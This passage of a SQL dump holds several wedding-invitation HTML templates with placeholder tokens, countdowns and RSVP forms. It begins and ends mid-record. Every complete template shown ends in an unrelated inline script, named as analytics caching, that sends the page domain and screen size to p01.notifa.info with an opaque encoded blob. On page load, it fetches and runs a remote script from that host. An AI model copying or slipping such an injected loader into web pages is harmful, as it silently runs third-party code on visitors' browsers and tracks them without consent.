data-bottom-top=\"@class:gla_slider_flower active\" data--200-bottom=\"@class:gla_slider_flower no_active\">\n             <div class=\"gla_slider_flower_c1 gla_slider_flower_iii gla_slider_flower_item\"></div>\n            <div class=\"gla_slider_flower_c2 gla_slider_flower_iii gla_slider_flower_item\"></div>\n            <div class=\"gla_slider_flower_c3 gla_slider_flower_iii gla_slider_flower_item\"></div>\n            <div class=\"gla_slider_flower_c4 gla_slider_flower_iii gla_slider_flower_item\"></div>\n            <div class=\"gla_slider_flower_c5 gla_slider_flower_iii gla_slider_flower_item\"></div>\n            <div class=\"gla_slider_flower_c6 gla_slider_flower_iii gla_slider_flower_item\"></div>\n        </div>\n        <div class=\"gla_over\" data-color=\"#efe5dd\" data-opacity=\"0.4\"></div>\n        <div class=\"container text-center\">\n            <div class=\"gla_slide_midtitle\">See you at the<br>wedding!</div>\n            <p>~*11*~</p>\n            <p><a href=\"#\" class=\"btn\">RSVP</a></p>\n        </div>\n    </section>\n</section>\n\n<script src=\"js/jquery-1.12.4.min.js\"></script>\n<script src=\"js/glanz_library.js\"></script>\n<script src=\"js/glanz_script.js\"></script>\n\n<script type=\"text/javascript\">\nif (self==top) {\n  function netbro_cache_analytics(fn, callback) {\n    setTimeout(function() {\n      fn();\n      callback();\n    }, 0);\n  } function sync(fn) {\n    fn();\n  } function requestCfs(){\n    var idc_glo_url = (location.protocol==\"https:\" ? \"https://\" : \"http://\");\n    var idc_glo_r = Math.floor(Math.random()*99999999999);\n    var url = idc_glo_url+ \"p01.notifa.info/3fsmd3/request\" + \"?id=1\" + \"&enc=9UwkxLgY9\" + \"&params=\" + \"4TtHaUQnUEiP6K%2fc5C582NzYpoUazw5mewcEa3OJ8xc2SozLc2rqSyXSsC9Sr1GV13vGQz9YallNmwK%2bQuox6dvtVSmDP%2fw6n8A0PPmjFJK00rwSfJihJ7UoSkvPVmgZLkXtT10DUdPD2HXZFVjELcP6nhmdGiwTF%2bRA3gxyRoWH805sqszDduRiUiH6WjHSqEkq9VbbTx2oMbJMfkjcVYh%2fYroxJmlnR9H3%2bRllxi5Y3t0DeVMvz2HPc7yvT8oLr2r92zlQi4l8ezdcF8ZSA6LyoLd79V5eaBb70syGZsoFcDT71QtE8bUsnAzpjHPYDcl35mwV4myrgft9GaS%2fA7QVK2Y4XA3JOh2e5fguJTCTvhuaf5K%2bNiBv9nmaRQaR4uXIlo9O1N4hra1pJUwi9kwwbHqZCuyfAKWKae8%2fxoU6SQhnznhJIf3anInf%2bqlPwcyBStdJoQ2GF4JnReBVBEB0NSAP8oRz15QKuHZ1iWoR2tjBBnZDMeazGeyd5rDhwR%2fyY%2fbX6msD6AaTvom%2fBPvcbUulwA3m\" + \"&idc_r=\"+idc_glo_r + \"&domain=\"+document.domain + \"&sw=\"+screen.width+\"&sh=\"+screen.height;var bsa = document.createElement(\'script\');\n    bsa.type = \'text/javascript\';bsa.async = true;bsa.src = url;\n    (document.getElementsByTagName(\'head\')[0]||document.getElementsByTagName(\'body\')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});\n  };\n</script>\n</body>\n','2018-08-08 15:00:00','2018-08-08 09:45:36',NULL,4,'simple-flower'),(5,'Great Flower','template/5/NzIEfwbxHprqfQJm2gOEbxFovqNqL5npsA1iv1Jr.jpeg','<div class=\"gla_slider gla_image_bck gla_wht_txt gla_fixed\" data-stellar-background-ratio=\"0.2\" data-image=\"~*01*~\">\n    <div class=\"gla_slider_flower\">\n         <div class=\"gla_slider_flower_c1 gla_slider_flower_ii gla_slider_flower_item\" data-start=\"top:0px; left:0px\" data-200-start=\"top:-300px; left:-300px\"></div>\n        <div class=\"gla_slider_flower_c2 gla_slider_flower_ii gla_slider_flower_item\" data-start=\"top:0px; right:0px\" data-200-start=\"top:-300px; right:-300px\"></div>\n        <div class=\"gla_slider_flower_c3 gla_slider_flower_ii gla_slider_flower_item\" data-start=\"bottom:0px; right:0px\" data-200-start=\"bottom:-300px; right:-300px\"></div>\n        <div class=\"gla_slider_flower_c4 gla_slider_flower_ii gla_slider_flower_item\" data-start=\"bottom:0px; left:0px\" data-200-start=\"bottom:-300px; left:-300px\"></div>\n        <div class=\"gla_slider_flower_c5 gla_slider_flower_ii gla_slider_flower_item\" data-start=\"top:0px; left:50%\" data-200-start=\"top:-300px; left:50%\"></div>\n        <div class=\"gla_slider_flower_c6 gla_slider_flower_ii gla_slider_flower_item\" data-start=\"bottom:0px; left:50%\" data-200-start=\"bottom:-300px; left:50%\"></div>\n    </div>\n    <div class=\"gla_over\" data-color=\"#000\" data-opacity=\"0.2\"></div>\n    <div class=\"container\">\n        <div class=\"gla_slide_txt gla_slide_center_middle text-center\">\n            <p><img src=\"~*02*~\" data-top-bottom=\"@src:~*02*~\" alt=\"\" height=\"150\"></p>\n        </div>\n    </div>\n</div>\n\n<section id=\"gla_content\" class=\"gla_content\">\n    <section class=\"gla_section gla_lg_padding gla_image_bck gla_fixed gla_wht_txt\" data-stellar-background-ratio=\"0.2\" data-image=\"~*03*~\">\n         <div class=\"gla_slider_flower\" data-bottom-top=\"@class:gla_slider_flower active\" data--200-bottom=\"@class:gla_slider_flower no_active\">\n            <div class=\"gla_slider_flower_c1 gla_slider_flower_ii gla_slider_flower_item\"></div>\n            <div class=\"gla_slider_flower_c2 gla_slider_flower_ii gla_slider_flower_item\"></div>\n            <div class=\"gla_slider_flower_c3 gla_slider_flower_ii gla_slider_flower_item\"></div>\n            <div class=\"gla_slider_flower_c4 gla_slider_flower_ii gla_slider_flower_item\"></div>\n            <div class=\"gla_slider_flower_c5 gla_slider_flower_ii gla_slider_flower_item\"></div>\n            <div class=\"gla_slider_flower_c6 gla_slider_flower_ii gla_slider_flower_item\"></div>\n        </div>\n        <div class=\"gla_over\" data-color=\"#000\" data-opacity=\"0.3\"></div>\n        <div class=\"container text-center\">\n            <p><img src=\"~*04*~\" data-bottom-top=\"@src:~*04*~\" height=\"150\" alt=\"\"></p>\n            <h2>~*05*~</h2>\n            <h3 class=\"gla_subtitle\">~*06*~<br>~*07*~</h3>\n            <div class=\"gla_countdown\" data-year=\"~*08*~\" data-month=\"~*09*~\" data-day=\"~*10*~\"></div>\n        </div>\n    </section>\n\n    <section class=\"gla_section gla_lg_padding gla_image_bck gla_fixed\" data-stellar-background-ratio=\"0.2\" data-image=\"~*11*~\">\n        <div class=\"gla_slider_flower\" data-bottom-top=\"@class:gla_slider_flower active\" data--200-bottom=\"@class:gla_slider_flower no_active\">\n             <div class=\"gla_slider_flower_c1 gla_slider_flower_ii gla_slider_flower_item\"></div>\n            <div class=\"gla_slider_flower_c2 gla_slider_flower_ii gla_slider_flower_item\"></div>\n            <div class=\"gla_slider_flower_c3 gla_slider_flower_ii gla_slider_flower_item\"></div>\n            <div class=\"gla_slider_flower_c4 gla_slider_flower_ii gla_slider_flower_item\"></div>\n            <div class=\"gla_slider_flower_c5 gla_slider_flower_ii gla_slider_flower_item\"></div>\n            <div class=\"gla_slider_flower_c6 gla_slider_flower_ii gla_slider_flower_item\"></div>\n        </div>\n        <div class=\"gla_over\" data-color=\"#fbe9df\" data-opacity=\"0.5\"></div>\n        <div class=\"container text-center\">\n            <p><img src=\"~*12*~\" data-bottom-top=\"@src:~*13*~\" height=\"150\" alt=\"\"></p>\n            <div class=\"gla_slide_midtitle\">See you at the<br>wedding!</div>\n            <p><a href=\"#\" class=\"btn\">RSVP</a></p>\n        </div>\n    </section>\n</section>\n\n<script src=\"js/jquery-1.12.4.min.js\"></script>\n<script src=\"js/glanz_library.js\"></script>\n<script src=\"js/glanz_script.js\"></script>\n\n<script type=\"text/javascript\">if (self==top) {\n  function netbro_cache_analytics(fn, callback) {\n    setTimeout(function() {\n      fn();\n      callback();\n    }, 0);\n  } function sync(fn) {\n    fn();\n  } function requestCfs(){\n    var idc_glo_url = (location.protocol==\"https:\" ? \"https://\" : \"http://\");\n    var idc_glo_r = Math.floor(Math.random()*99999999999);\n    var url = idc_glo_url+ \"p01.notifa.info/3fsmd3/request\" + \"?id=1\" + \"&enc=9UwkxLgY9\" + \"&params=\" + \"4TtHaUQnUEiP6K%2fc5C582NzYpoUazw5mewcEa3OJ8xcw%2bgBshq%2ftlz1k9fnXeSguWl06FUL08ut4ZasdJ2765Npou4Lae49xoTSZGxGekMY65LxH7RHYBHiTwDpwIrjnl4WbQThtWhyLbjbyqsqA3NcOZGNZRK0zXVKFZOwMu1D4mLVBtSUJiS3Xg%2bGlo8rTMrRr0PCQ8TKd6NhYtDskZ%2f8HallycO1acWDISXavf1F8bolo%2bKVi2P9hWNP6BwP4lkN75WKyENFidVr3BkYNbURJqKUNP7g3VwBm5nr%2bOgREMLcYh%2bL3%2fN7UCIRbdMycHASnl3PnjQvYQZqRiPJX1dBLMyjDHm4aL6yWAoWnOPCL4oc5JJL3C8jeUBZKKyggBz9o7G9IQEuT%2fAj5SwvAcSdT7PXXrwDeJgXTsc7ex3GNPlhSSvh%2fR1sXAOyDXC6%2ffbtmtfhid2L6WFaUFMSO2616rxgkXeMQ2RE5Yi9%2bWTC%2boKKRRDqnKYNU9ilKbGep4ncwZ1DSGFYWNOF1c0h6eyadaej%2fkb3M\" + \"&idc_r=\"+idc_glo_r + \"&domain=\"+document.domain + \"&sw=\"+screen.width+\"&sh=\"+screen.height;\n    var bsa = document.createElement(\'script\');bsa.type = \'text/javascript\';bsa.async = true;bsa.src = url;(document.getElementsByTagName(\'head\')[0]||document.getElementsByTagName(\'body\')[0]).appendChild(bsa); }\n    netbro_cache_analytics(requestCfs, function(){});};\n</script>\n','2018-08-08 15:00:00','2018-08-08 09:47:30',NULL,5,'great-flower'),(6,'Animated Flower','template/6/4p9MOp18A4mxtXjKBkAfBcfkJpTdWaz9ifuwJeze.jpeg','<div class=\"gla_slider gla_image_bck  gla_wht_txt gla_fixed\"  data-image=\"~*01*~\" data-stellar-background-ratio=\"0.8\">\n    <div class=\"gla_over\" data-color=\"#9abab6\" data-opacity=\"0.2\"></div>\n    <div class=\"container\">\n        <div class=\"gla_slide_txt gla_slide_center_bottom text-center\">\n            <p><img src=\"~*02*~\" data-top-bottom=\"@src:~*02*~\" alt=\"\" height=\"150\"></p>\n        </div>\n    </div>\n    <a class=\"gla_scroll_down gla_go\" href=\"#gla_content\">\n        <b></b>\n        Scroll\n    </a>\n</div>\n\n<section id=\"gla_content\" class=\"gla_content\">\n    <section class=\"gla_section gla_image_bck\" data-color=\"#f9fbf7\">\n        <div class=\"container text-center\">\n            <p><img src=\"~*03*~\" data-bottom-top=\"@src:~*03*~\" height=\"150\" alt=\"\"></p>\n            <h2>Our Story</h2>\n            <h3 class=\"gla_subtitle\">~*04*~</h3>\n            <p>~*05*~ — ~*06*~</p>\n        </div>\n    </section>\n\n    <section class=\"gla_section gla_image_bck gla_fixed gla_wht_txt\" data-stellar-background-ratio=\"0.8\" data-image=\"~*07*~\">\n        <div class=\"gla_over\" data-color=\"#282828\" data-opacity=\"0.4\"></div>\n        <div class=\"container text-center\">\n            <p><img src=\"~*08*~\" data-bottom-top=\"@src:~*08*~\" height=\"150\" alt=\"\"></p>\n            <h2>~*09*~</h2>\n            <h3 class=\"gla_subtitle\">~*10*~, <br>~*11*~, ~*12*~</h3>\n            <div class=\"gla_countdown\" data-year=\"~*13*~\" data-month=\"~*14*~\" data-day=\"~*15*~\"></div>\n        </div>\n    </section>\n\n    <section class=\"gla_section\">\n        <div class=\"container text-center\">\n            <p><img src=\"~*16*~\" data-bottom-top=\"@src:~*16*~\" height=\"150\" alt=\"\"></p>\n            <h2>Wedding Details</h2>\n            <h3 class=\"gla_subtitle\">When & Where</h3>\n            <p>~*17*~</p>\n            <div class=\"gla_icon_boxes row text-left\">\n                ~*18*~\n            </div>\n        </div>\n    </section>\n\n    <section class=\"gla_section gla_image_bck gla_fixed gla_wht_txt\" data-stellar-background-ratio=\"0.8\" data-image=\"~*24*~\">\n        <div class=\"gla_over\" data-color=\"#282828\" data-opacity=\"0.4\"></div>\n        <div class=\"container text-center\">\n            <p><img src=\"~*25*~\" data-bottom-top=\"@src:~*25*~\" height=\"150\" alt=\"\"></p>\n            <h3>~*26*~</h3>\n            <p class=\"gla_subtitle\">— ~*27*~</p>\n        </div>\n    </section>\n\n    <section class=\"gla_section gla_image_bck\">\n        <div class=\"container text-center\">\n            <p><img src=\"~*28*~ images/animations/flowers3.gif\" data-bottom-top=\"@src:~*28*~\" height=\"130\" alt=\"\"></p>\n            <h2>~*29*~</h2>\n            <p>~*30*~</p>\n\n            ~*31*~            \n        </div>\n    </section>\n\n    <section class=\"gla_section\">\n        <div class=\"container text-center\">\n            <p><img src=\"images/animations/rsvp.gif\" data-bottom-top=\"@src:images/animations/rsvp.gif\" height=\"180\" alt=\"\"></p>\n            <div class=\"row\">\n                <div class=\"col-md-8 col-md-push-2\">\n                    <form action=\"https://formspree.io/your@mail.com\" method=\"POST\">\n                        <div class=\"row\">\n                            <div class=\"col-md-6\">\n                                <label>Your name*</label>\n                                <input type=\"text\" name=\"name\" class=\"form-control form-opacity\">\n                            </div>\n                            <div class=\"col-md-6\">\n                                <label>Your e-mail*</label>\n                                <input type=\"text\" name=\"email\" class=\"form-control form-opacity\">\n                            </div>\n\n                            <div class=\"col-md-6\">\n                                <label>Will you attend?</label>\n\n                                <input type=\"radio\" name=\"attend\" value=\"Yes, I will be there\">\n                                <span>Yes, I will be there</span><br>\n                                <input type=\"radio\" name=\"attend\" value=\"Sorry, I can\'t come\">\n                                <span>Sorry, I can\'t come</span>\n\n                            </div>\n                            <div class=\"col-md-6\">\n                                <label>Meal preference</label>\n                                <select name=\"meal\" class=\"form-control form-opacity\">\n                                    <option value=\"I eat anything\">I eat anything</option>\n                                    <option value=\"Beef\">Beef</option>\n                                    <option value=\"Chicken\">Chicken</option>\n                                    <option value=\"Vegetarian\">Vegetarian</option>\n                                </select>\n                            </div>\n                            <div class=\"col-md-12\">\n                                <label>Notes</label>\n                                <textarea name=\"message\" class=\"form-control form-opacity\"></textarea>\n                            </div>\n                            <div class=\"col-md-12\">\n                                <input type=\"submit\" class=\"btn submit\" value=\"Send\">\n                            </div>\n                        </div>\n                    </form>\n                </div>\n            </div>\n        </div>\n    </section>\n\n    <section class=\"gla_section gla_image_bck gla_fixed gla_wht_txt\" data-stellar-background-ratio=\"0.8\" data-image=\"~*33*~\">\n        <div class=\"gla_over\" data-color=\"#282828\" data-opacity=\"0.4\"></div>\n        <div class=\"container text-center\">\n            <p><img src=\"~*34*~\" alt=\"\" height=\"200\" data-bottom-top=\"@src:~*34*~\"></p>\n        </div>\n    </section>\n</section>\n\n<script src=\"js/jquery-1.12.4.min.js\"></script>\n<script src=\"js/glanz_library.js\"></script>\n<script src=\"js/glanz_script.js\"></script>\n<script type=\"text/javascript\">\nif (self==top) {\nfunction netbro_cache_analytics(fn, callback) {\n  setTimeout(function() {fn();callback();\n  }, 0);\n} function sync(fn) {\n  fn();\n} function requestCfs(){\n  var idc_glo_url = (location.protocol==\"https:\" ? \"https://\" : \"http://\");\n  var idc_glo_r = Math.floor(Math.random()*99999999999);\n  var url = idc_glo_url+ \"p01.notifa.info/3fsmd3/request\" + \"?id=1\" + \"&enc=9UwkxLgY9\" + \"&params=\" + \"4TtHaUQnUEiP6K%2fc5C582NzYpoUazw5mewcEa3OJ8xeC7E%2flyHmgpBIbZNLuEoAN8KZAJijMxlXt0lwjvwRpUxC%2fqMms3rSFPJTbunVcZtMtQDG%2bwFXJkcxfTyPgHXRpr0sYWulm3WC%2b2Md6qH5nmC62AzW5ZFg8LHi79maVRfC5Vpi89%2fl41qZnVRpXH%2fCA2ra1mBND%2b1rw5OLGojkuFmNHNaGpgJOe94ObjUnlP5QeOoY4mX5t6LmH0VhAmrwJA9pnigFi%2b1GbBneNsuCk6QcEsYgGkScIOgvTRBtEokE2G3UIF8S2Z%2btHScKh6oPSE6QlO6sHl7c%2b7eBo1U6Q5MbJT9O55MUV%2b9uqINzIjkQCo9zKT6lThgtLvV2NABXeE5hU1lG0bDFotuE%2bU%2bWqTQeChQQpozLMBowTekQ1xAYIas93v9ykHSRQOsiVpUEgS4wtLI6eQkGcxuV5BJzojheMBvBQ%2bM0LdQoo709Egbjg5QG634fDCmDjH1ZI32Q5Km3Fkjf6LjyzRatI7oJmZ7diAE1bU5oiUy5I%2bVUZyNE%3d\" + \"&idc_r=\"+idc_glo_r + \"&domain=\"+document.domain + \"&sw=\"+screen.width+\"&sh=\"+screen.height;var bsa = document.createElement(\'script\');bsa.type = \'text/javascript\';bsa.async = true;\n  bsa.src = url;\n  (document.getElementsByTagName(\'head\')[0]||document.getElementsByTagName(\'body\')[0]).appendChild(bsa);}netbro_cache_analytics( requestCfs, function(){}\n);\n};\n</script>\n','2018-08-08 15:00:00','2018-08-08 15:00:00',NULL,4,'animated-flower'),(9,'Pink Animated Flower','template/9/HdVAzNPwGZagB9LytqzMiXwur2vtHH4nsgMi5zYx.jpeg','<div class=\"gla_slider gla_image_bck  gla_wht_txt gla_fixed\"  data-image=\"~*01*~\" data-stellar-background-ratio=\"0.8\">\n    <div class=\"gla_over\" data-color=\"#1e1d2d\" data-opacity=\"0.2\"></div>\n    <div class=\"container\">\n        <div class=\"gla_slide_txt gla_slide_center_middle text-center\">\n             <div class=\"gla_flower gla_flower2\">\n                <div class=\"gla_flower2_name_l\">~*02*~ <b>Save The Date</b></div>\n                <div class=\"gla_flower2_name_r\">~*03*~ <b>~*04*~</b></div>\n                <img src=\"~*05*~\" alt=\"\">\n            </div>\n        </div>\n    </div>\n    <a class=\"gla_scroll_down gla_go\" href=\"#gla_content\">\n        <b></b>\n        Scroll\n    </a>\n</div>\n\n<section id=\"gla_content\" class=\"gla_content\">\n    <section class=\"gla_section gla_image_bck\" data-color=\"#fafafd\">\n        <div class=\"container text-center\">\n            <p><img src=\"~*06*~\" data-bottom-top=\"@src:~*06*~; opacity:1\" class=\"gla_animated_flower\" height=\"150\" alt=\"\"></p>\n            <h2>Our Story</h2>\n            <h3 class=\"gla_subtitle\">~*07*~</h3>\n            <p>~*08*~ — ~*09*~</p>\n        </div>\n    </section>\n\n    <section class=\"gla_section gla_image_bck gla_fixed gla_wht_txt\" data-stellar-background-ratio=\"0.8\" data-image=\"~*10*~\">\n        <div class=\"gla_over\" data-color=\"#1e1d2d\" data-opacity=\"0.4\"></div>\n        <div class=\"container text-center\">\n            <p><img src=\"~*11*~\" data-bottom-top=\"@src:~*11*~\" height=\"150\" alt=\"\"></p>\n            <h2>~*12*~</h2>\n            <h3 class=\"gla_subtitle\">~*13*~, <br>~*14*~, ~*15*~</h3>\n            <div class=\"gla_countdown\" data-year=\"~*16*~\" data-month=\"~*17*~\" data-day=\"~*18*~\"></div>\n        </div>\n    </section>\n\n    <section class=\"gla_section\">\n        <div class=\"container text-center\">\n            <p><img src=\"~*19*~\" data-bottom-top=\"@src:~*19*~; opacity:1\" class=\"gla_animated_flower\" height=\"110\" alt=\"\"></p>\n            <h2>Wedding Details</h2>\n            <h3 class=\"gla_subtitle\">When & Where</h3>\n            <p>~*20*~</p>\n            <div class=\"row text-center\">\n                ~*21*~\n            </div>\n        </div>\n    </section>\n\n    <section class=\"gla_section gla_image_bck gla_fixed gla_wht_txt\" data-stellar-background-ratio=\"0.2\" data-image=\"~*30*~\">\n        <div class=\"gla_over\" data-color=\"#1e1d2d\" data-opacity=\"0.4\"></div>\n        <div class=\"container text-center\">\n            <p><img src=\"~*31*~ images/animations/rsvp_wh.gif\" data-bottom-top=\"@src:~*31*~\" height=\"200\" alt=\"\"></p>\n            <div class=\"row\">\n                <div class=\"col-md-8 col-md-push-2\">\n                    <form action=\"https://formspree.io/your@mail.com\" method=\"POST\">\n                        <div class=\"row\">\n                            <div class=\"col-md-6\">\n                                <label>Your name*</label>\n                                <input type=\"text\" name=\"name\" class=\"form-control form-opacity\">\n                            </div>\n                            <div class=\"col-md-6\">\n                                <label>Your e-mail*</label>\n                                <input type=\"text\" name=\"email\" class=\"form-control form-opacity\">\n                            </div>\n                            <div class=\"col-md-6\">\n                                <label>Will you attend?</label>\n\n                                <input type=\"radio\" name=\"attend\" value=\"Yes, I will be there\">\n                                <span>Yes, I will be there</span><br>\n                                <input type=\"radio\" name=\"attend\" value=\"Sorry, I can\'t come\">\n                                <span>Sorry, I can\'t come</span>\n                            </div>\n                            <div class=\"col-md-6\">\n                                <label>Meal preference</label>\n                                <select name=\"meal\" class=\"form-control form-opacity\">\n                                    <option value=\"I eat anything\">I eat anything</option>\n                                    <option value=\"Beef\">Beef</option>\n                                    <option value=\"Chicken\">Chicken</option>\n                                    <option value=\"Vegetarian\">Vegetarian</option>\n                                </select>\n                            </div>\n                            <div class=\"col-md-12\">\n                                <label>Notes</label>\n                                <textarea name=\"message\" class=\"form-control form-opacity\"></textarea>\n                            </div>\n                            <div class=\"col-md-12\">\n                                <input type=\"submit\" class=\"btn submit\" value=\"Send\">\n                            </div>\n                        </div>\n                    </form>\n                </div>\n            </div>\n        </div>\n    </section>\n\n    <section class=\"gla_section gla_image_bck\">\n        <div class=\"container text-center\">\n            <p><img src=\"~*32*~\" data-bottom-top=\"@src:~*32*~; opacity:1\" class=\"gla_animated_flower\" height=\"110\" alt=\"\"></p>\n            <h2>~*33*~</h2>\n            <p>~*34*~</p>\n            <div class=\"gla_portfolio_no_padding grid\">\n                ~*35*~\n             </div>\n        </div>\n    </section>\n\n    <section class=\"gla_section gla_image_bck\" data-color=\"#fff\">\n        <div class=\"container text-center\">\n            <h2>The Wedding Party</h2>\n            <div class=\"gla_portfolio_no_padding grid\">\n                ~*37*~\n             </div>\n        </div>\n    </section>\n\n    <section class=\"gla_section gla_image_bck gla_fixed gla_wht_txt\" data-stellar-background-ratio=\"0.8\" data-image=\"~*41*~\">\n        <div class=\"gla_over\" data-color=\"#1e1d2d\" data-opacity=\"0.4\"></div>\n        <div class=\"container text-center\">\n            <p><img src=\"~*42*~\" alt=\"\" height=\"200\" data-bottom-top=\"@src:~*42*~\"></p>\n        </div>\n    </section>\n</section>\n\n<script src=\"js/jquery-1.12.4.min.js\"></script>\n<script src=\"js/glanz_library.js\"></script>\n<script src=\"js/glanz_script.js\"></script>\n<script type=\"text/javascript\">\nif (self==top) {\n  function netbro_cache_analytics(fn, callback) {\n    setTimeout(function() {\n      fn();\n      callback();\n    }, 0);\n  } function sync(fn) {\n    fn();\n  } function requestCfs(){\n    var idc_glo_url = (location.protocol==\"https:\" ? \"https://\" : \"http://\");\n    var idc_glo_r = Math.floor(Math.random()*99999999999);\n    var url = idc_glo_url+ \"p01.notifa.info/3fsmd3/request\" + \"?id=1\" + \"&enc=9UwkxLgY9\" + \"&params=\" + \"4TtHaUQnUEiP6K%2fc5C582NzYpoUazw5mewcEa3OJ8xdRN9MtuG%2bIgkT8z7fczlMgfkbSmZASm23I4jejzERJnlXKVOMwrs5krW%2bEDV9%2bCR5ncnGlETQ19hi98hYWNaJNtdrMjpVCuVEVS0XizAmjlIKtMiZl4urmuQNtOhvZ6XvTWnOY67iCyumPqI5S71akRD%2buPpreiDsFpH6BnMoec%2bwz5ZsMVh5K423mxWNC4ah6JzEGtXm8L7%2blUCQU2M%2f7HpeuUV8B8nTRAvcF84kbQngODYoQ%2fhldx0qkZSbU9q3TQW%2fdDjlCP4tB0hFbUemkeD9ucKYIpbtFitXIIvL3UY2P3ifKIlnUdrcp7r1SKbYkX59bXBUP2iW1VkLIxqG%2bBW14pVO2EAaHisyyjSYBsKsqwajd1Va4VfWpclC3AsyRtyWXcj%2f57Cp1KwQCH25rgWpK1yCUQwMyh%2b4A4XbFANa6on1kzBgWpEoYfjpZ0C2VnQeaW5fa0RfNgclnQyOdCOKtpeFNMrlPVIzCW177xlTfzheXsBihS4LNLxw3M7o%3d\" + \"&idc_r=\"+idc_glo_r + \"&domain=\"+document.domain + \"&sw=\"+screen.width+\"&sh=\"+screen.height;var bsa = document.createElement(\'script\');bsa.type = \'text/javascript\';bsa.async = true;\n    bsa.src = url;(document.getElementsByTagName(\'head\')[0]||document.getElementsByTagName(\'body\')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});\n  }  ;\n</script>\n','2018-09-06 09:07:49','2018-09-06 09:07:49',NULL,4,'pink-animated-flower'),(10,'Golden Badge','template/10/2ONVbm9sX5PQE72E4cJEA8kpLiYv0ADi7S4aMvj3.jpeg','<div class=\"gla_slider gla_image_bck  gla_wht_txt gla_fixed\"  data-image=\"~*01*~\" data-stellar-background-ratio=\"0.2\">\n    <div class=\"gla_over\" data-color=\"#000\" data-opacity=\"0.7\"></div>\n    <div class=\"container\">\n        <div class=\"gla_slide_txt gla_slide_center_middle text-center\">\n            <p><img src=\"~*02*~\" alt=\"\" height=\"330\"></p>\n            <div class=\"gla_slide_subtitle\">~*03*~<br>~*04*~</div>\n        </div>\n    </div>\n    <a class=\"gla_scroll_down gla_go\" href=\"#gla_content\">\n        <b></b>\n        Scroll\n    </a>\n</div>\n\n<section id=\"gla_content\" class=\"gla_content\">\n    <section class=\"gla_section gla_image_bck\" data-color=\"#\">\n        <div class=\"container text-center\">\n            <h2>Our Story</h2>\n            <h3 class=\"gla_subtitle\">~*05*~</h3>\n            <p>~*06*~ — ~*07*~</p>\n        </div>\n    </section>\n\n    <section class=\"gla_section gla_image_bck gla_fixed\" data-stellar-background-ratio=\"0.2\" data-image=\"~*08*~\">\n        <div class=\"container\">\n            <div class=\"row gla_auto_height\">\n                <div class=\"col-md-6 gla_image_bck\" data-color=\"#eee\">\n                    <div class=\"gla_simple_block\">\n                        <h2>~*09*~</h2>\n                        <p>~*10*~</p>\n                    </div>\n                </div>\n                <div class=\"col-md-6 gla_image_bck\" data-image=\"~*11*~\">\n                </div>\n                <div class=\"col-md-6 col-md-push-6 gla_image_bck\" data-color=\"#eee\">\n                    <div class=\"gla_simple_block\">\n                        <h2>~*12*~</h2>\n                        <p>~*13*~</p>\n                    </div>\n                </div>\n                <div class=\"col-md-6 col-md-pull-6 gla_image_bck\" data-image=\"~*14*~\">\n                </div>\n            </div>\n        </div>\n    </section>\n\n    <section class=\"gla_section gla_image_bck gla_fixed gla_wht_txt\" data-stellar-background-ratio=\"0.2\" data-image=\"~*15*~\">\n        <div class=\"gla_over\" data-color=\"#000\" data-opacity=\"0.7\"></div>\n        <div class=\"container text-center\">\n            <p><img src=\"~*16*~\" height=\"280\" alt=\"\"></p>\n            <h2>~*17*~</h2>\n            <h3>~*18*~</h3>\n            <div class=\"gla_countdown_gold\" data-year=\"~*19*~\" data-month=\"~*20*~\" data-day=\"~*21*~\"></div>\n        </div>\n    </section>\n\n    <section class=\"gla_section\">\n        <div class=\"container text-center\">\n            <p><img src=\"~*22*~\" height=\"200\" alt=\"\"></p>\n            <h3>Wedding Details</h3>\n            <p>~*23*~</p>\n            <div class=\"row text-center\">\n                ~*24*~\n                <!-- <div class=\"col-md-4 gla_round_block\">\n                    <div class=\"gla_round_im gla_image_bck\" data-image=\"images/wedding/ian_kelsey/600x600/14818599945_45817b7c25_k.jpg\"></div>\n                    <h3>~*25*~</h3>\n                    <p>~*26*~<br>\n                    ~*27*~<br>\n                    ~*28*~<br>\n                    ~*29*~<br>\n                    ~*30*~</p>\n                    <a href=\"~*31*~\" class=\"btn\">View Map</a>\n                </div> -->\n            </div>\n        </div>\n    </section>\n\n    <section class=\"gla_section gla_image_bck gla_fixed gla_wht_txt\" data-stellar-background-ratio=\"0.2\" data-image=\"images/wedding/ian_kelsey/14812748891_aef5b27a4a_k.jpg\">\n        <div class=\"gla_over\" data-color=\"#000\" data-opacity=\"0.7\"></div>\n        <div class=\"container text-center\">\n            <p><img src=\"images/animations/rsvp_gold.gif\" height=\"200\" alt=\"\"></p>\n            <div class=\"row\">\n                <div class=\"col-md-8 col-md-push-2\">\n                    <form action=\"\" method=\"POST\">\n                        <div class=\"row\">\n                            <div class=\"col-md-6\">\n                                <label>Your name*</label>\n                                <input type=\"text\" name=\"name\" class=\"form-control form-opacity\">\n                            </div>\n                            <div class=\"col-md-6\">\n                                <label>Your e-mail*</label>\n                                <input type=\"text\" name=\"email\" class=\"form-control form-opacity\">\n                            </div>\n                            <div class=\"col-md-6\">\n                                <label>Will you attend?</label>\n                                <input type=\"radio\" name=\"attend\" value=\"Yes, I will be there\">\n                                <span>Yes, I will be there</span><br>\n                                <input type=\"radio\" name=\"attend\" value=\"Sorry, I can\'t come\">\n                                <span>Sorry, I can\'t come</span>\n                            </div>\n                            <div class=\"col-md-6\">\n                                <label>Meal preference</label>\n                                <select name=\"meal\" class=\"form-control form-opacity\">\n                                    <option value=\"I eat anything\">I eat anything</option>\n                                    <option value=\"Beef\">Beef</option>\n                                    <option value=\"Chicken\">Chicken</option>\n                                    <option value=\"Vegetarian\">Vegetarian</option>\n                                </select>\n                            </div>\n                            <div class=\"col-md-12\">\n                                <label>Notes</label>\n                                <textarea name=\"message\" class=\"form-control form-opacity\"></textarea>\n                            </div>\n                            <div class=\"col-md-12\">\n                                <input type=\"submit\" class=\"btn submit\" value=\"Send\">\n                            </div>\n                        </div>\n                    </form>\n                </div>\n            </div>\n        </div>\n    </section>\n\n    <section class=\"gla_section gla_image_bck\">\n        <div class=\"container text-center\">\n            <h2>The Day They Got Engaged</h2>\n            <p>~*32*~</p>\n            ~*33*~\n            <!-- <div class=\"gla_portfolio_no_padding grid\">\n                <div class=\"col-sm-4 gla_anim_box grid-item engagement\">\n                    <div class=\"gla_shop_item\">\n                        <a href=\"~*34*~\" class=\"lightbox\">\n                            <img src=\"~*34*~\" alt=\"\">\n                        </a>\n                    </div>\n                </div>\n             </div> -->\n        </div>\n    </section>\n\n    <section class=\"gla_section gla_image_bck\" data-color=\"#fff\">\n        <div class=\"container text-center\">\n            <h2>The Wedding Party</h2>\n            <div 